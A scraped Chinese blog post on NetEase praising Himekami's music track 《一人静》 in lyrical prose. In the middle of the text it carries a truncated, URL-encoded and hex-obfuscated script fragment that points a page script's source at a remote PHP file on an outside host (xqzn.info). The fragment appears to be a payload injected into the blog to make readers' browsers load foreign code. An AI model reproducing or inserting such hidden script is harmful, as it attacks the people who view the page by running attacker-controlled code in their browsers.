注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

惜然

安静地离去,没留下只言片语。

 
 
 

日志

 
 

周末音乐欣赏:《一人静》  

2010-08-20 15:47:27|  分类: 音乐欣赏 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

    

 

周末音乐欣赏:《一人静》 - 淡然 - 人生最美是淡然

 
 

 

 

周末音乐欣赏:《一人静》
   

   姬神“星吉昭”,是日本与喜多郎齐名的新世纪音乐教父,姬神将日本东北的原始风貌与风俗民情与严谨的电子音色紧密结合在一起。他的音乐风格具有浓厚的民族风味,与众不同,结合科幻、宗教、部落、神秘等元素的手法演绎出令人折服的音乐,他的音乐是一股无穷的魔力,让人欲罢不能!这首《一人静》就是出自姬神之手!

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<   用心聆听姬神的作品《一人静》,空灵沉寂的曲调一点点的浸入我的灵魂深处,仿佛是来自我梦中的声音,我第一次在现实世界里,真真切切地触摸它的脉动……

   一股清泉在心涧慢慢流淌,乐曲的精灵和我身体的某个区域在缠绵,独自一人,一盏清茶,坐在窗前,只静逸的夜晚,逃离城市的嘈杂与喧嚣。

   静静地聆听,轻轻地敲击着心灵,望穿远山的深黛。看,月光拥吻星星;心,闲闲的探视。一份独特的宁静,于是心灵独自漫步, 披一袭天籁, 抖落一地的晨风。已经好久没有这样自然的感觉,仿佛回到了千年之前。夜晚的星空美丽的让人不忍低头,看着如斯璀璨,心好似回归原始。原来已经这么久没有仰望夜空了,城市里的天空总是模糊不清。

   想要记起些什么,又想什么都不要记 ,点亮月夜中明灯,让灵魂独自行走 .一个人静静的坐在窗前,一个人静静的倾听,一个人静静的……

   周末,闲暇之余静静地品味这首异域纯音,相信您会与我有一样的感动与沉醉!

周末音乐欣赏:《一人静》 - 淡然 - 人生最美是淡然

 

周末音乐欣赏:《一人静》 - 淡然 - 人生最美是淡然

 

 

  评论这张
 
阅读(368)| 评论(67)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017